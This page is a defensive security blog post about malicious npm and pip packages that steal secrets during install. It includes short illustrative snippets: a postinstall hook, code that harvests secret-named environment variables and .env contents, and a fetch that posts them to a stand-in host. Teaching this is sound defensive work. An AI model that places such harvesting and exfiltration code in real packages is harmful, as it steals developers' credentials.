<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Why npm, pip, and direct Git dependencies can expose your secrets, how the attack works, and which controls actually reduce the blast radius.">
<meta property="og:type" content="article">
<meta property="og:title" content="Every Package You Install Can Read Your Secrets">
<meta property="og:url" content="https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/index.html">
<meta property="og:site_name" content="Eliran Turgeman">
<meta property="og:description" content="Why npm, pip, and direct Git dependencies can expose your secrets, how the attack works, and which controls actually reduce the blast radius.">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2026-03-28T05:17:32.000Z">
<meta property="article:modified_time" content="2026-03-31T16:35:46.837Z">
<meta property="article:author" content="Eliran Turgeman">
<meta property="article:tag" content="application-security">
<meta property="article:tag" content="don&#39;t get hacked">
<meta name="twitter:card" content="summary">
    
    
    <meta name="keywords" content="supply chain attacks, malicious packages, dependency security, env secrets, npm security, pip security" />
    
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:title" content="Every Package You Install Can Read Your Secrets" />
    <meta name="twitter:description" content="Why npm, pip, and direct Git dependencies can expose your secrets, how the attack works, and which controls actually reduce the blast radius." />
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Every Package You Install Can Read Your Secrets</title>
    <!-- canonical -->
    <link rel="canonical" href="https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/" />
    
    <!-- JSON-LD structured data -->
    <script type="application/ld+json">
    {"@context":"https://schema.org","@type":"BlogPosting","headline":"Every Package You Install Can Read Your Secrets","description":"Why npm, pip, and direct Git dependencies can expose your secrets, how the attack works, and which controls actually reduce the blast radius.","datePublished":"2026-03-28T05:17:32.000Z","dateModified":"2026-03-31T16:35:46.837Z","author":{"@type":"Person","name":"Eliran Turgeman","url":"https://www.eliranturgeman.com"},"publisher":{"@type":"Person","name":"Eliran Turgeman","url":"https://www.eliranturgeman.com"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/"},"url":"https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/","wordCount":1414,"articleSection":"application-security, don't get hacked","keywords":"supply chain attacks, malicious packages, dependency security, env secrets, npm security, pip security"}
    </script>
    
    
    <!-- prevent flash of wrong theme -->
    <script>
    (function(){var t=localStorage.getItem('cactus-theme');if(t)document.documentElement.setAttribute('data-theme',t)})();
    </script>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- theme definitions -->
    
<link rel="stylesheet" href="/css/themes.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/elt.xml" title="Eliran Turgeman" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
  <div id="theme-switcher" class="theme-switcher">
    <button class="theme-switcher__btn" aria-label="Change theme" type="button">
      <i class="fas fa-sun"></i>
    </button>
    <div class="theme-switcher__panel"></div>
  </div>
  <!-- <div id="banner" class="banner">
    <div class="banner-content">
        <span id="closeBanner" class="banner-close">&times;</span>
        <p>
          Become a better software engineer with <a href="https://404skill.github.io/" target="_blank">404skill</a> —
          <a href="https://404skill.github.io/" target="_blank">start for free</a>
        </p>
    </div>
  </div> -->
</div>
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li>
            <a href="/">Home</a>
          </li><!--
     --><!--
       --><li>
            <a href="/about/">About</a>
          </li><!--
     --><!--
       --><li>
            <a href="/security-for-builders/">Security for Builders</a>
          </li><!--
     --><!--
       --><li>
            <a href="/archives/">Archives</a>
          </li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/03/21/budget-drained/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
        <li><a class="icon" aria-label="Subscribe" href="https://newsletter.eliranturgeman.com" target="_blank" rel="noopener"><i class="fas fa-envelope" aria-hidden="true" onmouseover="$('#i-subscribe').toggle();" onmouseout="$('#i-subscribe').toggle();"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
      <span id="i-subscribe" class="info" style="display:none;">Subscribe</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&text=Every Package You Install Can Read Your Secrets"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&is_video=false&description=Every Package You Install Can Read Your Secrets"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Every Package You Install Can Read Your Secrets&body=Check out this article: https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&name=Every Package You Install Can Read Your Secrets&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&t=Every Package You Install Can Read Your Secrets"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#A-Common-Setup"><span class="toc-number">1.</span> <span class="toc-text">A Common Setup</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#How-It-Works"><span class="toc-number">2.</span> <span class="toc-text">How It Works</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-Get-code-to-run"><span class="toc-number">2.1.</span> <span class="toc-text">1. Get code to run</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Read-the-secrets-already-in-reach"><span class="toc-number">2.2.</span> <span class="toc-text">2. Read the secrets already in reach</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-Send-them-out"><span class="toc-number">2.3.</span> <span class="toc-text">3. Send them out</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-Use-the-credentials"><span class="toc-number">2.4.</span> <span class="toc-text">4. Use the credentials</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Why-This-Keeps-Working"><span class="toc-number">3.</span> <span class="toc-text">Why This Keeps Working</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Incidents"><span class="toc-number">4.</span> <span class="toc-text">Incidents</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Controls-That-Change-The-Exposure"><span class="toc-number">5.</span> <span class="toc-text">Controls That Change The Exposure</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Make-installs-repeatable"><span class="toc-number">5.1.</span> <span class="toc-text">Make installs repeatable</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pin-CI-actions-and-release-tooling"><span class="toc-number">5.2.</span> <span class="toc-text">Pin CI actions and release tooling</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Separate-build-time-and-runtime-secrets"><span class="toc-number">5.3.</span> <span class="toc-text">Separate build-time and runtime secrets</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Be-slower-around-direct-Git-installs-and-tiny-convenience-packages"><span class="toc-number">5.4.</span> <span class="toc-text">Be slower around direct Git installs and tiny convenience packages</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Watch-outbound-traffic-from-sensitive-environments"><span class="toc-number">5.5.</span> <span class="toc-text">Watch outbound traffic from sensitive environments</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#A-Short-Review"><span class="toc-number">6.</span> <span class="toc-text">A Short Review</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <main>
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Every Package You Install Can Read Your Secrets
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Eliran Turgeman</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-03-28T05:17:32.000Z" itemprop="datePublished">2026-03-28</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/application-security/" rel="tag">application-security</a>, <a class="tag-link-link" href="/tags/don-t-get-hacked/" rel="tag">don't get hacked</a>
    </div>


      
        <span class="read-time">
          <i class="fas fa-clock"></i>
          6 minutes
        </span>
      
    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    
    <p>You add a package, CI installs it, and the same environment can read your database URL, your Stripe key, your OpenAI key, and your deploy token. At that point you are not just adding a library. You are allowing third-party code to run inside a process that already has access to things you care about.</p>
<p>That is why dependency compromises so often turn into secret compromises. The package does not need to exploit your app first. It only needs to run during install, build, or import, read what the current process can already read, and send it somewhere else.</p>
<h2 id="A-Common-Setup"><a href="#A-Common-Setup" class="headerlink" title="A Common Setup"></a>A Common Setup</h2><p>The setup is usually ordinary. One <code>.env</code> file holds most of the secrets for a service, and one CI job installs dependencies, runs tests, builds the app, and deploys it. Preview environments, build containers, and worker processes inherit the same environment because splitting credentials by step and by service takes more work.</p>
<p>It can look like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">OPENAI_API_KEY=sk_live_...</span><br><span class="line">STRIPE_SECRET_KEY=sk_live_...</span><br><span class="line">DATABASE_URL=postgres://app:password@db.internal/prod</span><br><span class="line">INTERNAL_API_TOKEN=...</span><br></pre></td></tr></table></figure>

<p>In a setup like that, the package does not need much sophistication. If it can run, it can usually read more than it should, and most environments already allow the outbound traffic needed to send those values elsewhere.</p>
<h2 id="How-It-Works"><a href="#How-It-Works" class="headerlink" title="How It Works"></a>How It Works</h2><h3 id="1-Get-code-to-run"><a href="#1-Get-code-to-run" class="headerlink" title="1. Get code to run"></a>1. Get code to run</h3><p>The first step is getting code to execute in a context that already has access to something valuable. In practice, that can be a package pulled from a tutorial or docs page, a direct Git dependency that solves one irritating problem, a new GitHub Action added to speed up CI, or an indirect dependency that changed after a maintainer compromise. npm explicitly allows install-time scripts like <code>preinstall</code>, <code>install</code>, <code>postinstall</code>, and <code>prepare</code> (<a target="_blank" rel="noopener" href="https://docs.npmjs.com/cli/v10/using-npm/scripts">npm scripts documentation</a>), and Git dependencies with a <code>prepare</code> script can run code during install too.</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">	<span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;tiny-auth-helper&quot;</span><span class="punctuation">,</span></span><br><span class="line">	<span class="attr">&quot;version&quot;</span><span class="punctuation">:</span> <span class="string">&quot;1.0.0&quot;</span><span class="punctuation">,</span></span><br><span class="line">	<span class="attr">&quot;scripts&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">		<span class="attr">&quot;postinstall&quot;</span><span class="punctuation">:</span> <span class="string">&quot;node postinstall.js&quot;</span></span><br><span class="line">	<span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>Installing the package can be enough. Python reaches the same outcome through different packaging paths. pip’s secure installs guidance says ordinary installs can run arbitrary code from distributions unless you tighten the mode with controls like hashes and binary-only installs (<a target="_blank" rel="noopener" href="https://pip.pypa.io/en/stable/topics/secure-installs/">pip secure installs</a>). pip also supports direct installs from version control URLs, including Git repositories (<a target="_blank" rel="noopener" href="https://pip.pypa.io/en/stable/topics/vcs-support/">pip VCS support</a>). The useful defense at this stage is to keep dependency installation away from real secrets. If a CI job installs packages, it should not also hold production deploy keys, cloud credentials, and long-lived API secrets.</p>
<h3 id="2-Read-the-secrets-already-in-reach"><a href="#2-Read-the-secrets-already-in-reach" class="headerlink" title="2. Read the secrets already in reach"></a>2. Read the secrets already in reach</h3><p>Once malicious code runs, secret access is usually straightforward. Most apps expose useful values through environment variables, config files, cloud credential files, or mounted service-account tokens.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> fs <span class="keyword">from</span> <span class="string">&#x27;node:fs&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> snapshot = &#123;</span><br><span class="line">	<span class="attr">env</span>: <span class="title class_">Object</span>.<span class="title function_">fromEntries</span>(</span><br><span class="line">		<span class="title class_">Object</span>.<span class="title function_">entries</span>(process.<span class="property">env</span>).<span class="title function_">filter</span>(<span class="function">(<span class="params">[name]</span>) =&gt;</span></span><br><span class="line">			<span class="regexp">/KEY|TOKEN|SECRET|DATABASE_URL/</span>.<span class="title function_">test</span>(name)</span><br><span class="line">		)</span><br><span class="line">	),</span><br><span class="line">	<span class="attr">dotEnv</span>: fs.<span class="title function_">existsSync</span>(<span class="string">&#x27;.env&#x27;</span>) ? fs.<span class="title function_">readFileSync</span>(<span class="string">&#x27;.env&#x27;</span>, <span class="string">&#x27;utf8&#x27;</span>) : <span class="literal">null</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>There is nothing sophisticated about that example. The package is reading what the current process can already read. That is why broad <code>.env</code> files are dangerous. If your frontend build only needs a public analytics ID, it should not run in an environment that also exposes Stripe secrets. If your email worker only sends mail, it should not also see your database superuser password. The defense here is structural: split credentials by service and environment, and give each workload only the secrets it actually needs.</p>
<h3 id="3-Send-them-out"><a href="#3-Send-them-out" class="headerlink" title="3. Send them out"></a>3. Send them out</h3><p>Exfiltration is often just a normal network request.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> <span class="title function_">fetch</span>(<span class="string">&#x27;https://example.invalid/collect&#x27;</span>, &#123;</span><br><span class="line">	<span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">	<span class="attr">headers</span>: &#123;<span class="string">&#x27;content-type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span>&#125;,</span><br><span class="line">	<span class="attr">body</span>: <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(snapshot)</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>A malicious package can wait until later, send only a few values, or hide inside traffic that looks like telemetry. Because outbound traffic is already normal in build jobs and application workloads, secret theft can blend into expected behavior unless you watch for it. The corresponding defense is visibility. Add logging around outbound calls from CI jobs and sensitive services, and if a dependency install step should only reach your package registry and source control provider, restrict it to those endpoints.</p>
<h3 id="4-Use-the-credentials"><a href="#4-Use-the-credentials" class="headerlink" title="4. Use the credentials"></a>4. Use the credentials</h3><aside class="mid-article-cta" data-analytics-location="mid_article_cta"><p class="mid-article-cta__text">I'm breaking down the ways production systems actually get exploited — and the defenses that work. Part of <strong><a href="/security-for-builders/">Security for Builders</a></strong>.</p><form class="mid-article-cta__form email-signup__form" action="https://app.kit.com/forms/9085244/subscriptions" method="POST" target="_blank" data-analytics-event="newsletter_form_submit" data-analytics-action="submit" data-analytics-location="mid_article_cta"><input class="email-signup__input" type="email" name="email_address" placeholder="your@email.com" autocomplete="email" required><button class="email-signup__button" type="submit">Subscribe</button></form></aside><p>The damage depends on what you exposed. An OpenAI key burns credits. A Stripe key can expose customer or payment data, depending on scope. A broad database credential can leak records or allow destructive writes. An internal bearer token can turn one compromised service into access to several more. This is mainly a privilege problem. Malicious code can only do what the current process can do, which is exactly why broad, long-lived credentials create so much avoidable exposure. The defense is to narrow that scope with separate tokens per service and environment, and with short-lived identity where your platform supports it.</p>
<h2 id="Why-This-Keeps-Working"><a href="#Why-This-Keeps-Working" class="headerlink" title="Why This Keeps Working"></a>Why This Keeps Working</h2><p>This keeps working for two reasons. The first is that package installation is a code-execution path in common tooling. In npm, lifecycle hooks are an explicit feature (<a target="_blank" rel="noopener" href="https://docs.npmjs.com/cli/v10/using-npm/scripts">npm scripts documentation</a>). In Python, pip warns that ordinary installs involve arbitrary code unless you constrain the process (<a target="_blank" rel="noopener" href="https://pip.pypa.io/en/stable/topics/secure-installs/">pip secure installs</a>). The second is that many products still treat secrets as ambient configuration instead of privileged data. Once a process starts, everything in its <code>.env</code> becomes part of the attack surface of every dependency it loads.</p>
<h2 id="Incidents"><a href="#Incidents" class="headerlink" title="Incidents"></a>Incidents</h2><p>The newest example hit a modern AI stack. Aqua’s March 2026 advisory says attackers compromised Trivy’s release path, published a malicious <code>trivy</code> v0.69.4, and retagged <code>trivy-action</code> and <code>setup-trivy</code>, then used those trusted CI paths to steal runner secrets (<a target="_blank" rel="noopener" href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/">Aqua advisory</a>). LiteLLM’s incident report says versions <code>1.82.7</code> and <code>1.82.8</code> on PyPI were malicious and that the team believes the compromise started with the Trivy dependency in its CI security scanning workflow (<a target="_blank" rel="noopener" href="https://github.com/BerriAI/litellm/blob/main/docs/my-website/blog/security_update_march_2026/index.md">LiteLLM incident report</a>). According to LiteLLM, those packages scanned for environment variables, SSH keys, cloud credentials, Kubernetes tokens, and database passwords, then sent them to an unofficial domain.</p>
<h2 id="Controls-That-Change-The-Exposure"><a href="#Controls-That-Change-The-Exposure" class="headerlink" title="Controls That Change The Exposure"></a>Controls That Change The Exposure</h2><p>Most dependency-security advice is too vague to change behavior. The controls below matter because they change privilege, repeatability, or visibility.</p>
<h3 id="Make-installs-repeatable"><a href="#Make-installs-repeatable" class="headerlink" title="Make installs repeatable"></a>Make installs repeatable</h3><p>Commit <code>package-lock.json</code> so CI and teammates install the same dependency tree instead of whatever newly compatible transitive version appears that day (<a target="_blank" rel="noopener" href="https://docs.npmjs.com/cli/v10/configuring-npm/package-lock-json">npm package-lock documentation</a>). In Python, pin requirements and use <code>--require-hashes</code> in high-trust environments. pip documents that hash-checking mode requires pinned requirements and local hashes for all dependencies (<a target="_blank" rel="noopener" href="https://pip.pypa.io/en/stable/topics/secure-installs/">pip secure installs</a>).</p>
<p>This does not make a malicious package safe, but it does stop surprise drift.</p>
<h3 id="Pin-CI-actions-and-release-tooling"><a href="#Pin-CI-actions-and-release-tooling" class="headerlink" title="Pin CI actions and release tooling"></a>Pin CI actions and release tooling</h3><p>Aqua’s Trivy advisory recommends pinning GitHub Actions to full commit SHAs instead of mutable version tags, because tags were one of the attacker-controlled distribution points in that incident (<a target="_blank" rel="noopener" href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/">Aqua advisory</a>). If your workflow says <code>uses: vendor/action@v1</code>, you are still trusting a moving target.</p>
<h3 id="Separate-build-time-and-runtime-secrets"><a href="#Separate-build-time-and-runtime-secrets" class="headerlink" title="Separate build-time and runtime secrets"></a>Separate build-time and runtime secrets</h3><p>Your dependency install step should not see the same credentials as your live service handling user data. If one pipeline installs packages, runs tests, builds images, and deploys with one environment full of long-lived secrets, split that job. In practice, this often reduces more risk than adding another scanner, because it removes access instead of only reporting on it.</p>
<h3 id="Be-slower-around-direct-Git-installs-and-tiny-convenience-packages"><a href="#Be-slower-around-direct-Git-installs-and-tiny-convenience-packages" class="headerlink" title="Be slower around direct Git installs and tiny convenience packages"></a>Be slower around direct Git installs and tiny convenience packages</h3><p>You do not need to read every line of every transitive dependency. You do need to slow down around fresh packages with few maintainers, direct Git installs to random repositories, and packages you added quickly without much review. That is especially true for commands like <code>pip install git+...</code>, GitHub Actions you have never used before, and small npm packages with install scripts.</p>
<h3 id="Watch-outbound-traffic-from-sensitive-environments"><a href="#Watch-outbound-traffic-from-sensitive-environments" class="headerlink" title="Watch outbound traffic from sensitive environments"></a>Watch outbound traffic from sensitive environments</h3><p>Secret scanning, dependency alerts, and SBOM tools help before deployment. Egress visibility helps after prevention fails. If a CI runner suddenly posts data to a new host, you want to know that the same day.</p>
<h2 id="A-Short-Review"><a href="#A-Short-Review" class="headerlink" title="A Short Review"></a>A Short Review</h2><p>If you only do one pass after reading this, check these five things:</p>
<ol>
<li>Which secrets are present during <code>npm install</code>, <code>pip install</code>, image builds, and CI setup steps?</li>
<li>Which GitHub Actions are pinned to full SHAs, and which still use floating tags?</li>
<li>Which services are running with one broad <code>.env</code> instead of scoped credentials?</li>
<li>Which direct Git dependencies or new low-trust packages were added recently?</li>
<li>Which environments can make outbound requests without any logging or allowlist?</li>
</ol>
<p>If you find problems in those five areas, the basic failure mode is already present. Every dependency is code with your privileges, so the question worth answering in your own system is which secrets each process can reach right now.</p>
<p>Supply chain attacks exploit the trust boundary between your code and everything it depends on. Other attack surfaces — <a href="/2026/03/14/uploads-attack-surface/">file uploads</a>, <a href="/2026/03/06/malicious-user-input/">injection</a>, <a href="/2026/02/20/secrets-leaked/">credential leaks</a>, <a href="/2026/03/21/budget-drained/">cloud cost abuse</a> — follow completely different patterns and need different controls. I write these deep-dives for engineers who’d rather learn this from a blog post than from a production incident. <a target="_blank" rel="noopener" href="https://newsletter.eliranturgeman.com/">Get them by email →</a></p>

  </div>
</article>

<section class="email-signup email-signup--inline" data-analytics-location="inline_bottom_cta">
  
<h3 class="email-signup__title">Get new posts by email</h3>
<p class="email-signup__description">I break down how production systems actually get hacked — and how to defend them. One deep-dive at a time, for engineers who ship.</p>
<form
  class="email-signup__form"
  action="https://app.kit.com/forms/9085244/subscriptions"
  method="POST"
  target="_blank"
  data-analytics-event="newsletter_form_submit"
  data-analytics-action="submit"
  data-analytics-location="email_signup"
  data-analytics-label="Subscribe"
>
  <input
    class="email-signup__input"
    type="email"
    name="email_address"
    placeholder="your@email.com"
    autocomplete="email"
    required
    data-analytics-event="newsletter_input_focus"
    data-analytics-action="focus"
    data-analytics-location="email_signup"
  >
  
    <input type="hidden" name="source" value="https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/">
  
  <button class="email-signup__button" type="submit"
    data-analytics-event="newsletter_cta_click"
    data-analytics-action="click"
    data-analytics-location="email_signup"
    data-analytics-label="Subscribe"
  >
    Subscribe
  </button>
</form>

</section>

<script>
document.addEventListener('DOMContentLoaded', () => {
  // ── Track all newsletter form submissions ──
  document.querySelectorAll('.email-signup__form').forEach((form) => {
    form.addEventListener('submit', () => {
      const location = form.closest('[data-analytics-location]');
      const loc = location ? location.getAttribute('data-analytics-location') : 'unknown';
      if (typeof window.gtag === 'function') {
        window.gtag('event', 'newsletter_form_submit', {
          page_path: window.location.pathname,
          page_referrer: document.referrer || '',
          form_location: loc,
          traffic_source: new URLSearchParams(window.location.search).get('utm_source') || 'direct'
        });
      }
    });
  });

  // ── Track email input focus (intent signal) ──
  document.querySelectorAll('.email-signup__input').forEach((input) => {
    let tracked = false;
    input.addEventListener('focus', () => {
      if (tracked) return;
      tracked = true;
      const location = input.closest('[data-analytics-location]');
      const loc = location ? location.getAttribute('data-analytics-location') : 'unknown';
      if (typeof window.gtag === 'function') {
        window.gtag('event', 'newsletter_input_focus', {
          page_path: window.location.pathname,
          form_location: loc
        });
      }
    });
  });

  // ── Reddit-aware CTA personalisation ──
  var isReddit = false;
  try {
    var ref = document.referrer || '';
    var params = new URLSearchParams(window.location.search);
    isReddit = ref.indexOf('reddit.com') !== -1 || params.get('utm_source') === 'reddit';
  } catch (e) {}

  if (isReddit) {
    document.querySelectorAll('.mid-article-cta__text').forEach(function (el) {
      el.innerHTML = 'Liked this breakdown? I write more like it — how real systems get exploited, and what stops it. Get them by email.';
    });
  }
});
</script>







<section class="related-posts" style="margin-top: 2rem;">
  <h3>Related Posts</h3>
  <ul>
    
      <li>
        <a href="/2026/03/21/budget-drained/">How Attackers Drain Your Cloud Budget</a>
      </li>
    
      <li>
        <a href="/2026/02/18/csrf-explained/">CSRF for Builders</a>
      </li>
    
      <li>
        <a href="/2026/03/06/malicious-user-input/">How Injection Keeps Breaking Real Systems</a>
      </li>
    
      <li>
        <a href="/2026/02/14/quick-security-audit/">A Practical Security Audit for Builders</a>
      </li>
    
      <li>
        <a href="/2026/02/20/secrets-leaked/">A Builder&#39;s Guide to Not Leaking Credentials</a>
      </li>
    
      <li>
        <a href="/2026/03/01/threat-model/">Threat Modelling for Builders</a>
      </li>
    
      <li>
        <a href="/2026/03/14/uploads-attack-surface/">How to Not Get Hacked Through File Uploads</a>
      </li>
    
  </ul>
</section>


        </main>
        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li>
            <a href="/">Home</a>
          </li>
         
          <li>
            <a href="/about/">About</a>
          </li>
         
          <li>
            <a href="/security-for-builders/">Security for Builders</a>
          </li>
         
          <li>
            <a href="/archives/">Archives</a>
          </li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#A-Common-Setup"><span class="toc-number">1.</span> <span class="toc-text">A Common Setup</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#How-It-Works"><span class="toc-number">2.</span> <span class="toc-text">How It Works</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-Get-code-to-run"><span class="toc-number">2.1.</span> <span class="toc-text">1. Get code to run</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Read-the-secrets-already-in-reach"><span class="toc-number">2.2.</span> <span class="toc-text">2. Read the secrets already in reach</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-Send-them-out"><span class="toc-number">2.3.</span> <span class="toc-text">3. Send them out</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-Use-the-credentials"><span class="toc-number">2.4.</span> <span class="toc-text">4. Use the credentials</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Why-This-Keeps-Working"><span class="toc-number">3.</span> <span class="toc-text">Why This Keeps Working</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Incidents"><span class="toc-number">4.</span> <span class="toc-text">Incidents</span></a></li><li class="toc-item 